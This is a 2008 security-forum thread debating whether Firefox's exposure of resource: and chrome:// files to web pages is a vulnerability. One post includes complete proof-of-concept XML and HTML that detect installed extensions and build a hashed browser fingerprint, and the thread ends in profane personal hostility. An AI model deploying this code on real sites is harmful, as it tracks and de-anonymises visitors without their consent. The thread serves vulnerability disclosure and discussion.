Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Firefox Vulnerable By Default
Posted by: Gareth Heyes
Date: February 11, 2008 08:27AM

No matter what Mozilla say...

http://www.0x000000.com/index.php?i=515

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Firefox Vulnerable By Default
Posted by: trev
Date: February 15, 2008 06:50AM

Heh, but Mozilla is right - you are only reading out files that are the same for every Firefox browser on the planet. You can just as well get them from FTP. And - no, you cannot read .manifest files like this (not that they would contain anything "useful").

Edit: This does not mean that allowing everything in the application directory to be accessed from a web page is nice, after all file:/// URLs are forbidden for a reason (still not in Internet Explorer I think). And from what I understand this will be fixed in Firefox 3, you will only be able to access the res/ subdirectory which is explicitly meant to be usable from the web.



Edited 1 time(s). Last edit at 02/15/2008 06:57AM by trev.

Options: ReplyQuote
Re: Firefox Vulnerable By Default
Posted by: Anonymous User
Date: February 15, 2008 07:16AM

That is not true, if you change your browser preference like your user agent, we can read out the original file in the greprefs and still know what browser you use, so it's not possible to anonymize yourself since I can read out which browser you use through the greprefs/all.js or firefox.js or any other 'standard' file :)

.manifest files CAN be accessed if someone installed an xpi other than from mozilla it tends to installs itself in that folder, I tried it out with XUL maker and it can have access to it.


hehe for all you Firefox fanboys:

xml file:

<!DOCTYPE window [

 <!ENTITY % brandDTD SYSTEM "chrome://branding/locale/brand.dtd">

  %brandDTD;

  <!ENTITY brandDTD "null">



  <!ENTITY % noscriptDTD SYSTEM "chrome://noscript/locale/noscript.dtd">

  %noscriptDTD;

  <!ENTITY noscriptPlugins "null">



  <!ENTITY % creditsDTD SYSTEM "chrome://browser/locale/credits.dtd">

  %creditsDTD;

  <!ENTITY brandMotto "null">



  <!ENTITY % cs_settingsDTD SYSTEM "chrome://cachestatus/locale/cs_settings.dtd">

  %cs_settingsDTD;

  <!ENTITY presence.label "null">



  <!ENTITY % ChromeListOverlayDTD SYSTEM "chrome://chromelist/locale/ChromeListOverlay.dtd">

  %ChromeListOverlayDTD;

  <!ENTITY chromelist.menu "null">



  <!ENTITY % downbartextDTD SYSTEM "chrome://downbar/locale/downbartext.dtd">

  %downbartextDTD;

  <!ENTITY pTitle.label "null">



  <!ENTITY % pref-fasterfoxDTD SYSTEM "chrome://fasterfox/locale/pref-fasterfox.dtd">

  %pref-fasterfoxDTD;

  <!ENTITY prefetching.tab "null">



  <!ENTITY % firebugDTD SYSTEM "chrome://firebug/locale/firebug.dtd">

  %firebugDTD;

  <!ENTITY firebug.Firebug "null">



  <!ENTITY % foxyproxyDTD SYSTEM "chrome://foxyproxy/locale/foxyproxy.dtd">

  %foxyproxyDTD;

  <!ENTITY foxyproxy.label "null">



  <!ENTITY % ocspDTD SYSTEM "chrome://mozapps/locale/preferences/ocsp.dtd">

  %ocspDTD;

  <!ENTITY certOCSP.label "null">



  <!ENTITY % aboutDTD SYSTEM "chrome://reporter/locale/about.dtd">

  %aboutDTD;

  <!ENTITY thanks.text "null">



  <!ENTITY % tamperdataDTD SYSTEM "chrome://tamperdata/locale/tamperdata.dtd">

  %tamperdataDTD;

  <!ENTITY tamperdata.toolbar.startTamper "null">



  <!ENTITY % entitiesDTD SYSTEM "chrome://trashmail/locale/entities.dtd">

  %entitiesDTD;

  <!ENTITY trashmail.title "null">



  <!ENTITY % useragentswitcherDTD SYSTEM "chrome://useragentswitcher/locale/useragentswitcher.dtd">

  %useragentswitcherDTD;

  <!ENTITY useragentswitcher.name "null">



  <!ENTITY % aboutDTD SYSTEM "chrome://simpledelicious/locale/about.dtd">

  %aboutDTD;

  <!ENTITY extName.label "null">



  <!ENTITY % autosavetexttocookieDTD SYSTEM "chrome://autosavetexttocookie/locale/autosavetexttocookie.dtd">

  %autosavetexttocookieDTD;

  <!ENTITY autosavetexttocookie.label "null">



  <!ENTITY % ieviewOverlayDTD SYSTEM "chrome://safariview/locale/ieviewOverlay.dtd">

  %ieviewOverlayDTD;

  <!ENTITY toolbarbutton.label "null">



  <!ENTITY % igsidebarDTD SYSTEM "chrome://igsidebar/locale/igsidebar.dtd">

  %igsidebarDTD;

  <!ENTITY igsidebar.title "null">



  <!ENTITY % keyscramblerDTD SYSTEM "chrome://keyscrambler/locale/keyscrambler.dtd">

  %keyscramblerDTD;

  <!ENTITY keyscrambler.label "null">



  <!ENTITY % overlayDTD SYSTEM "chrome://firephish/locale/overlay.dtd">

  %overlayDTD;

  <!ENTITY firephish "null">



  <!ENTITY % quickrestartDTD SYSTEM "chrome://quickrestart/locale/quickrestart.dtd">

  %quickrestartDTD;

  <!ENTITY menu.tools.item.restart "null">



  <!ENTITY % simplemailDTD SYSTEM "chrome://simplemail/locale/simplemail.dtd">

  %simplemailDTD;

  <!ENTITY sendBySimpleMail "null">



  <!ENTITY % sqlitemanagerDTD SYSTEM "chrome://sqlitemanager/locale/sqlitemanager.dtd">

  %sqlitemanagerDTD;

  <!ENTITY window.title "null">



  <!ENTITY % passhash-optionsDTD SYSTEM "chrome://passwordhasher/locale/passhash-options.dtd">

  %passhash-optionsDTD;

  <!ENTITY pshOpt.title "null"> 

  ]>



<body>  

<x1>&brandShortName;</x1>

<x2>&brandMotto;</x2>

<x3>&noscriptPlugins;</x3>

<x4>&presence.label;</x4>

<x5>&chromelist.menu;</x5>

<x6>&pTitle.label;</x6>

<x7>&prefetching.tab;</x7>

<x8>&firebug.Firebug;</x8>

<x9>&foxyproxy.label;</x9>

<x10>&certOCSP.label;</x10>

<x11>&thanks.text;</x11>

<x12>&tamperdata.toolbar.startTamper;</x12>

<x13>&trashmail.title;</x13>

<x14>&useragentswitcher.name;</x14>

<x15>&extName.label;</x15>

</body>

html file:

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>TOTAL RECALL</title>

<script>



	var tapped='';

	

    call_xml = document.implementation.createDocument('','',null);

	call_xml.async = false;

	call_xml.load("total_recall.xml");

	

	for(i=1;i<15;++i) {

	

		tapped += call_xml.getElementsByTagName("x"+i)[0].childNodes[0].nodeValue +'|';

	}



	function recon() {

		globals = '';

		globals +=  this.navigator.javaEnabled() + '|';

		globals += this.navigator.taintEnabled() + '|';

		globals += this.navigator.userAgent + '|';

		globals += this.navigator.appMinorVersion + '|';

		globals += this.navigator.appVersion + '|';

		globals += this.navigator.appName + '|';

		globals += this.screen.width + '|';

		globals += this.screen.height + '|';

		globals += this.screen.availWidth + '|';

		globals += this.screen.availHeight + '|';

		globals += this.screen.colorDepth + '|';

		globals += this.screen.pixelDepth + '|';

		globals += this.screen.bufferDepth + '|';	

		globals += this.navigator.mimeTypes.length + '|';

		globals += this.navigator.platform + '|';

		globals += this.navigator.cpuClass + '|';

		globals += this.navigator.language + '|';

		globals += this.navigator.browserLanguage + '|';

		globals += this.navigator.systemLanguage + '|';

		globals += this.navigator.userLanguage + '|';

		globals += this.navigator.cookieEnabled + '|';

		globals += this.navigator.userProfile + '|';

		return globals;

	}

		rr = recon();

		

	function total_recall_firefox() {

	

		alert('Computed hashsum: ' + x_recall(rr+tapped));

			

		document.write(tapped.replace(/\|/gim,'<br />'));

		document.write(rr.replace(/\|/gim,'<br />'));

	}

		

	function recall_md5(x,len){

		x[len>>5] |= 0x80<<((len) % 32);

		x[(((len+64) >>> 9)<<4)+14]=len;

		 var a= 1732584193; var b=-271733879; var c=-1732584194; var d= 271733878;

		for(var i=0; i < x.length; i += 16){ var olda=a; var oldb=b; var oldc=c; var oldd=d;

		a=x_ff(a,b,c,d,x[i+ 0],7 ,-680876936);  d=x_ff(d,a,b,c,x[i+ 1],12,-389564586);

		c=x_ff(c,d,a,b,x[i+ 2],17, 606105819);  b=x_ff(b,c,d,a,x[i+ 3],22,-1044525330);

		a=x_ff(a,b,c,d,x[i+ 4],7 ,-176418897);  d=x_ff(d,a,b,c,x[i+ 5],12, 1200080426);

		c=x_ff(c,d,a,b,x[i+ 6],17,-1473231341); b=x_ff(b,c,d,a,x[i+ 7],22,-45705983);

		a=x_ff(a,b,c,d,x[i+ 8],7 , 1770035416); d=x_ff(d,a,b,c,x[i+ 9],12,-1958414417);

		c=x_ff(c,d,a,b,x[i+10],17,-42063);      b=x_ff(b,c,d,a,x[i+11],22,-1990404162);

		a=x_ff(a,b,c,d,x[i+12],7 , 1804603682); d=x_ff(d,a,b,c,x[i+13],12,-40341101);

		c=x_ff(c,d,a,b,x[i+14],17,-1502002290); b=x_ff(b,c,d,a,x[i+15],22, 1236535329);

		a=x_gg(a,b,c,d,x[i+ 1],5 ,-165796510);  d=x_gg(d,a,b,c,x[i+ 6],9 ,-1069501632);

		c=x_gg(c,d,a,b,x[i+11],14, 643717713);  b=x_gg(b,c,d,a,x[i+ 0],20,-373897302);

		a=x_gg(a,b,c,d,x[i+ 5],5 ,-701558691);  d=x_gg(d,a,b,c,x[i+10],9 , 38016083);

		c=x_gg(c,d,a,b,x[i+15],14,-660478335);  b=x_gg(b,c,d,a,x[i+ 4],20,-405537848);

		a=x_gg(a,b,c,d,x[i+ 9],5 , 568446438);  d=x_gg(d,a,b,c,x[i+14],9 ,-1019803690);

		c=x_gg(c,d,a,b,x[i+ 3],14,-187363961);  b=x_gg(b,c,d,a,x[i+ 8],20, 1163531501);

		a=x_gg(a,b,c,d,x[i+13],5 ,-1444681467); d=x_gg(d,a,b,c,x[i+ 2],9 ,-51403784);

		c=x_gg(c,d,a,b,x[i+ 7],14, 1735328473); b=x_gg(b,c,d,a,x[i+12],20,-1926607734);

		a=x_hh(a,b,c,d,x[i+ 5],4 ,-378558);     d=x_hh(d,a,b,c,x[i+ 8],11,-2022574463);

		c=x_hh(c,d,a,b,x[i+11],16, 1839030562); b=x_hh(b,c,d,a,x[i+14],23,-35309556);

		a=x_hh(a,b,c,d,x[i+ 1],4 ,-1530992060); d=x_hh(d,a,b,c,x[i+ 4],11, 1272893353);

		c=x_hh(c,d,a,b,x[i+ 7],16,-155497632);  b=x_hh(b,c,d,a,x[i+10],23,-1094730640);

		a=x_hh(a,b,c,d,x[i+13],4 , 681279174);  d=x_hh(d,a,b,c,x[i+ 0],11,-358537222);

		c=x_hh(c,d,a,b,x[i+ 3],16,-722521979);  b=x_hh(b,c,d,a,x[i+ 6],23, 76029189);

		a=x_hh(a,b,c,d,x[i+ 9],4 ,-640364487);  d=x_hh(d,a,b,c,x[i+12],11,-421815835);

		c=x_hh(c,d,a,b,x[i+15],16, 530742520);  b=x_hh(b,c,d,a,x[i+ 2],23,-995338651);

	    a=x_ii(a,b,c,d,x[i+ 0],6 ,-198630844);  d=x_ii(d,a,b,c,x[i+ 7],10, 1126891415);

		c=x_ii(c,d,a,b,x[i+14],15,-1416354905); b=x_ii(b,c,d,a,x[i+ 5],21,-57434055);

		a=x_ii(a,b,c,d,x[i+12],6 , 1700485571); d=x_ii(d,a,b,c,x[i+ 3],10,-1894986606);

		c=x_ii(c,d,a,b,x[i+10],15,-1051523);    b=x_ii(b,c,d,a,x[i+ 1],21,-2054922799);

		a=x_ii(a,b,c,d,x[i+ 8],6 , 1873313359); d=x_ii(d,a,b,c,x[i+15],10,-30611744);

		c=x_ii(c,d,a,b,x[i+ 6],15,-1560198380); b=x_ii(b,c,d,a,x[i+13],21, 1309151649);

		a=x_ii(a,b,c,d,x[i+ 4],6 ,-145523070);  d=x_ii(d,a,b,c,x[i+11],10,-1120210379);

		c=x_ii(c,d,a,b,x[i+ 2],15, 718787259);  b=x_ii(b,c,d,a,x[i+ 9],21,-343485551);

		a=padd(a,olda);

		b=padd(b,oldb);

		c=padd(c,oldc);

		d=padd(d,oldd);

	  }

  	return Array(a,b,c,d);

	}



	function x_cmn(q,a,b,x,s,t)  { return padd(bit_rol(padd(padd(a,q),padd(x,t)),s),b); }

	function x_ff(a,b,c,d,x,s,t) { return x_cmn((b & c)|((~b) & d),a,b,x,s,t); }

	function x_gg(a,b,c,d,x,s,t) { return x_cmn((b & d)|(c & (~d)),a,b,x,s,t); }

	function x_hh(a,b,c,d,x,s,t) { return x_cmn(b^c^d,a,b,x,s,t); }

	function x_ii(a,b,c,d,x,s,t) { return x_cmn(c^(b|(~d)),a,b,x,s,t); }

	function bit_rol(num,cnt){ return (num<<cnt)|(num >>> (32 - cnt)); }

	

	function bhex(binarray){

	  var hex_tab="0123456789abcdef"; var scall_xml="";

	  for(var i=0; i < binarray.length * 4; i++){

		scall_xml += hex_tab.charAt((binarray[i>>2]>>((i%4)*8+4)) & 0xF) +

			   hex_tab.charAt((binarray[i>>2]>>((i%4)*8  )) & 0xF);

	  }

	  return scall_xml;

	}

	

	function bscall_xml(scall_xml){

	  var bin=Array(); var mask=(1<<8) - 1;

	  for(var i=0; i < scall_xml.length * 8; i += 8)

	  bin[i>>5] |= (scall_xml.charCodeAt(i / 8) & mask)<<(i%32);

	  return bin;

	}

	

	function padd(x,y){

	  var lsw=(x & 0xFFFF)+(y & 0xFFFF); var msw=(x>>16)+(y>>16)+(lsw>>16);

	  return (msw<<16)|(lsw & 0xFFFF);

	}

	

	function x_recall(s){ return bhex(recall_md5(bscall_xml(s),s.length * 8));}



</script>

</head>

<body>

	<script>total_recall_firefox();</script>

</body>

</html>



Edited 1 time(s). Last edit at 02/15/2008 07:26AM by Ronald.

Options: ReplyQuote
Re: Firefox Vulnerable By Default
Posted by: trev
Date: February 15, 2008 09:51AM

Quote

That is not true, if you change your browser preference like your user agent, we can read out the original file in the greprefs and still know what browser you use
So what? There are literally thousands of ways to recognize a particular browser. Changing user agent is for those stupid sites that look for "MSIE" there, otherwise it doesn't give you anything.

Quote

.manifest files CAN be accessed if someone installed an xpi other than from mozilla it tends to installs itself in that folder
No Firefox extension installs itself in the application directory. What you dig out there is an ancient (2004) extension meant for the Mozilla suite. And even then - you still didn't show how you want to read a .manifest file from a web page.

Quote

hehe for all you Firefox fanboys:
Fanboys? How about common sense?

Let's not mix apples and oranges here. The XML file you so proudly present - it's a well known issue (bug 292789). Random access to chrome:// should not be allowed, we all know this (and some of us even have their workarounds in place). But we are talking about resource: URLs here, right?

Options: ReplyQuote
Re: Firefox Vulnerable By Default
Posted by: Anonymous User
Date: February 15, 2008 10:16AM

Yeah so what? bit mad I attack your favorite little buggy browser? and downplay it because of it? I don't care about your comments.

I do know a way to get the files, I told about it. I got 2 file upload vulns. So narrow minded. All of sudden it isn't a problem but a feature.

Ah well, this year I devoted to Mozilla, another out-of-memory heap exploit is comming their way soon. Suck on that one and screw Mozilla.

You seem to know better, and thats fine I told you.

A fuck it's better than to re-hash the same of XSS shit for 2 years!

Options: ReplyQuote
Re: Firefox Vulnerable By Default
Posted by: trev
Date: February 15, 2008 10:53AM

Don't worry, I won't comment again on the "security vulnerabilities" you find.

Options: ReplyQuote
Re: Firefox Vulnerable By Default
Posted by: Anonymous User
Date: February 15, 2008 11:03AM

Screw you.

What do you have to bring to the table eh?

I just write about the stuff I find for my pleasure, I don't even post them on Bugzilla to claim my 500$ for the vulnerabilites I found, like others do. How's that for showing off?

I won't talk at those stupid meetings where only vendors try to shelf their insecure software, I don't talk at black-n00b-hat or other silly meetings to "show off"

I never asked to get /.'tted.

I fact I want everyone to fuck off from my blog and leave me alone.

btw the latest firefox got an update due to one of my exploits, and they never creditted me correctly. See, I don't care to claim it. still you upgrade to the newest firefox and piss me off, well that's fine and it tells enough.

Now that is showing off! because I don't care.



Edited 1 time(s). Last edit at 02/15/2008 11:08AM by Ronald.

Options: ReplyQuote
Re: Firefox Vulnerable By Default
Posted by: Anonymous User
Date: February 15, 2008 07:58PM

And that's the last thing I say on this forum, because you make me fucking sick. You know I'm tired of this bullshit, This is my last message ever, I will never post on this board again. Fin.

Options: ReplyQuote


Sorry, only registered users may post in this forum.